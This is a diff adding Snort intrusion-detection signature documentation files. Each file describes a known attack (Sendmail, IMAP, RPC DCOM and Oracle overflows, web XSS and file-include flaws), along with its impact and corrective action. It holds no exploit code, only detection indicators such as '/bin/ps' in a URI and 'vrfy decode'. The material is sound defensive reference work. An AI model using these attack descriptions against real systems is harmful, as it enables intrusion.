+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/950.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+950
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2270.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2270
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
--- /dev/null
+++ b/doc/signatures/3062.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+3062
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+delhomepage.cgi script which contains known vulnerabilities and
+is resident on Netscreen SA 5000 devices.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the
+delhomepage.cgi script which is known to be vulnerable to a cross site
+scripting attack
+
+--
+Affected Systems:
+	Netscreen SA 5000
+
+--
+Attack Scenarios:
+An attacker can supply code of their choosing to a client system by
+using the cgi script as part of a cross site scripting attack.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1329.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1329
+
+--
+Summary:
+This event is generated when an attempt is made to access the ps command
+via the web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a
+webserver. The ps command lists the process status of running processes
+on a UNIX or Linux based system. The attacker could possibly gain
+information needed for other attacks on the system.
+
+Using "ps", the attackers would check for various running system
+services to exploit or for the presence of security software, such as
+host IDS or monitoring scripts. This rule looks for the "ps" command in
+the URI part of the client to web server connection and does not
+indicate whether the command was actually successful in displaying the
+list of processes. The presence of the "ps" command in the URI indicates
+that an attacker attempted to trick the web server into executing system
+commands in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ps'in
+the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. This command may also be
+requested on a command line should the attacker gain access to the
+machine. On BSD derived systems, setting the parameter
+"kern.ps_showallprocs" to zero will show only the processes being run by
+that user except for root who will still see all processes.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1328
+
+Manual page for ps.
+
+http://linux.about.com/library/cmd/blcmdl1_ps.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1844.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1844
+
+--
+Summary:
+This event is generated when a remote attacker sends an overly long
+argument in the AUTHENTICATE command to an internal IMAP server,
+indicating an attempt to exploit a buffer overflow vulnerability in
+Netscape Messaging Server and University of Washington IMAP
+implementations. This may also affect other IMAP server implementations.
+
+--
+Impact:
+Remote execution of arbitrary code with the security privileges of the
+IMAP process, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+A buffer overflow vulnerability exists in the AUTHENTICATE command in
+University of Washington IMAP and Netscape Messaging Server. This can
+allow a remote attacker to send an AUTHENTICATE command with a
+malformed, overlong argument to a vulnerable IMAP server, causing a
+buffer overflow condition. The attacker can then execute arbitrary code
+on the server with the security privileges of the IMAP server process. 
+
+--
+Affected Systems:
+	Netscape Messaging Server 3.55 and earlier
+	University of Washington imapd 10.234 and earlier.
+
+--
+Attack Scenarios:
+An attacker sends an overly long, malformed argument to an AUTHENTICATE
+command to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker is then able to execute arbitrary code on the
+server with the security privileges of the IMAP server process.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches have been released for both UW IMAP and Netscape Messaging
+Server. Apply the patch or upgrade to a Netscape Messaging Server
+version higher than 3.55 or UW IMAP version higher than 10.234.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0005
+
+--
--- /dev/null
+++ b/doc/signatures/2903.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2903
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/931.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+931
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/500.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+500
+--
+Summary:
+This event is generated when an IPv4 packet has the loose source record 
+route IP option set.
+--
+Impact:
+Information could be gathered about network topology, and machines 
+routing packets onto trusted links could be abused.
+--
+Detailed Information:
+Loose source record routing specifies a series of machines which must be
+used in the routing of a datagram.  This can be useful to map out routes
+using the traceroute program by adding discovered intermediary routers 
+one at a time.  Furthermore, while a machine may normally be unreachable
+due to default gateways, a compliant router can be forced to hand off 
+source routed packets to an intermediary capable of speaking both to the
+outside world and target machines; the packet may then be forwarded on
+to its destination.
+--
+Affected Systems:
+Any machine fully implementing RFC 791 set up as a router.
+--
+Attack Scenarios:
+By incrementing the TTL of successive packets, the topology of routes to
+a host can be determined.  Each compliant node along the way will reply
+with an ICMP Time Exceeded bearing their address and the recorded route.
+--
+Ease of Attack:
+Tools are readily available to employ source routing for the purpose of
+network discovery; the bounce attack described is unlikely to surface in
+a properly configured network.
+--
+False Positives:
+None known.
+--
+False Negatives:
+Network discovery can be done using other means than source routing.
+--
+Corrective Action:
+Redesign network topologies so that routers are kept to a minimum;
+disable routing by other machines.  To prevent network mapping, don't
+allow source-routed packets at all. 
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nick Black, Reflex Security <dank@reflexsecurity.com>
+-- 
+Additional References:
+
+IP RFC:
+http://www.faqs.org/rfcs/rfc791.html
+
+--
--- /dev/null
+++ b/doc/signatures/311.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 311
+
+--
+Summary:
+Versions of the Netscape browser including and prior to 4.75 are vulnerable to a buffer overflow that may lead to arbitrary code execution on the victim host. It is also possible to open a root shell listening on a high port on the victim host. This event is generated when a request is made to a web site exploiting this vulnerability.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+execute arbitrary code on the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the HTML parser on some versions of Netscape Navigator. It is possible for a remote attacker to execute arbitrary code on the victim host.
+
+It is possible to crash Netscape Communicator if a large number of characters is supplied in a command from an interactive web page.
+
+Affected Systems:
+	Netscape Navigator 4.75 and prior
+
+--
+Attack Scenarios:
+The attacker would need to supply a link on a web page or HTML email that triggers the overflow. It is also possible to cause the overflow via HTML email.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1187
+
+Bugtraq:
+http://www.securityfocus.com/bid/822
+
+--
--- /dev/null
+++ b/doc/signatures/2683.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2683
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure sdo_code_size
+. This procedure is included in
+mdsys.md2.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1240.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid: 1240
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Marty Bochane MDBMS relational database system.
+
+--
+Impact:
+Serious. Execution of arbitrary code on the target server is possible.
+
+--
+Detailed Information:
+MDBMS is a relational databse system for UNIX style platforms. Certain
+versions of the software contain a vulnerability that can allow
+execution of arbitrary code on the server with the privileges of the
+user running MDBMS.
+
+--
+Affected Systems:
+	MDBMS 0.99b9 and prior
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3218.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3218
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000571.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000571
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_mod_rewrite.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_mod_rewrite.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1583.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1583
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/488.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+488
+
+--
+Summary:
+This event is generated when a connection is closed from a resource
+external to the protected network.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event indicates that an established connection has been closed
+from a source external to the protected network. Since the external
+connection port is 80, this is unusual behavior. It may be that an
+attacker is using port 80 on the external machine to initiate a
+connection to a machine on the protected network in an attempt to bypass
+firewall protection. When this connection is terminated, this rule will
+generate an event.
+
+--
+Affected Systems:
+	All systems
+	
+--
+Attack Scenarios:
+An attacker can use port 80 from a compromised machine to connect to
+another compromised host in an attempt to bypass firewall restrictions
+by imitating normal web traffic.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Investigate the host for signs of system compromise.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/672.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+672
+
+--
+Summary:
+This event is generated when a remote user attempts to scan for a vulnerability in the VRFY command on internal SMTP servers.
+
+--
+Impact:
+Information gathering, possibly leading to a future attack and system compromise. 
+
+--
+Detailed Information:
+If the decode alias on the Sendmail server is enabled, an attacker may be able to send messages to the decode alias email address, creating or overwriting files on the server. Vulnerability scanners use the "vrfy decode" command to verify that a decode alias is enabled.
+
+--
+Affected Systems:
+Systems running Sendmail.
+
+--
+Attack Scenarios:
+An attacker scans the server to determine that the decode alias exists. The attacker then sends an email address to the decode alias on the server, with directives to overwrite or create files on the server. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the decode alias by commenting out the "decode |/usr/bin/uudecode" line in your Sendmail aliases file.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0096
+
+--
--- /dev/null
+++ b/doc/signatures/945.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+945
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1923.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1923
+
+--
+Summary:
+This event is generated when an attempt is made to forward a Remote Procedure Call (RPC) request through the portmapper service.
+
+--
+Impact:
+Information disclosure.  This can detect and request RPC services offered.
+
+--
+Detailed Information:
+The RPC "callit" procedure allows the portmapper to act as a proxy to forward requests to other RPC services offered by the host. This allows an attacker to call an RPC service on the same host without knowing the port number associated with the RPC service.    
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can use the portmapper proxy to circumvent any required authentication when sending requests to the actual port associated with an RPC service.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+According to RFC 1057, this proxy feature supports broadcasts to RPC services using the well-known portmapper port. 
+
+This rule also generates an event when legitimate hosts attempt to use the proxy feature.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC:
+http://www.ietf.org/rfc/rfc1057.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/2488.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2488
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with winzip's processing of certain MIME archive files. 
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running winzip.
+
+--
+Detailed Information:
+Winzip is a program that is used for file compression on Windows hosts.
+A buffer overflow exists when parsing specific header fields for certain 
+MIME file types.  An overly long value passed to the Content-Disposition
+name field may trigger the buffer overflow and allow the execution of 
+arbitrary code in the context of the user running winzip.
+
+--
+Affected Systems:
+Winzip 6.x, 7.x, 8.0, 8.1 SR-1, 8.1, Winzip 9.0 beta versions
+
+--
+Attack Scenarios:
+An attacker can entice a user to open a malformed MIME file that will
+invoke winzip to process it, possibly causing a a buffer overflow 
+and the subsequent execution of arbitrary code on the vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://securityfocus.com/bid/9758
+
+--
--- /dev/null
+++ b/doc/signatures/713.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+713
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Lucent/Livingston Portmaster router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+This event is generated when an attempt is made to issue a Denial of
+Service (DoS) attack against a Livingston/Lucent router. In some
+situations malformed data sent to the Telnet service on the router can
+cause the DoS to occur.
+
+Lucent Portmaster routers were previously known as Livingston Portmaster
+from Livingston Technologies.
+
+--
+Affected Systems:
+	Lucent Portmaster 1.0
+	Lucent Portmaster 2.0
+	Lucent Portmaster 3.0
+
+--
+Attack Scenarios:
+The attacker can use one of the publicly available exploit scripts.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+The Portmaster series of routers is no longer available.
+
+Disable the Telnet service if possible.
+
+Reboot the router to regain the service
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2225
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0218
+
+--
--- /dev/null
+++ b/doc/signatures/496.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 496
+
+-- 
+Summary:
+This event is generated by the successful completion of a directory listing operation. This may be indicative of post-compromise behavior indicating the use of a Windows command shell for listing directory contents.
+
+-- 
+Impact: 
+Serious. An attacker may have the ability to execute commands remotely
+
+--
+Detailed Information:
+This event is generated when a standard Windows command for listing directories is executed. The string "Directory of" is typically shown in front of the directory listing on Windows NT/2000/XP.  
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has successfully executed at least one command to list the contents of a directory directory. Note that the source address of this event is actually
+the victim and not that of the attacker.
+
+--
+
+Attack Scenarios: 
+An attacker gains an access to a Windows web server via IIS vulnerability and manages to start a cmd.exe shell. He then proceeds to look for interesting files on the compromised server via the "dir" command.
+
+-- 
+
+Ease of Attack: 
+Simple. This post-attack behavior can accompany different attacks.
+
+-- 
+
+False Positives: 
+This rule will generate an event if the string "Directory of" appears in the content distributed by a web server, in which case the rule should be tuned.
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Investigate the web server for signs of compromise.
+
+Look for other IDS events involving the same IP addresses.
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000835.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000835
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Lazarus" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "img" parameter in the "picture.php" script used by the "Lazarus" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Lazarus
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
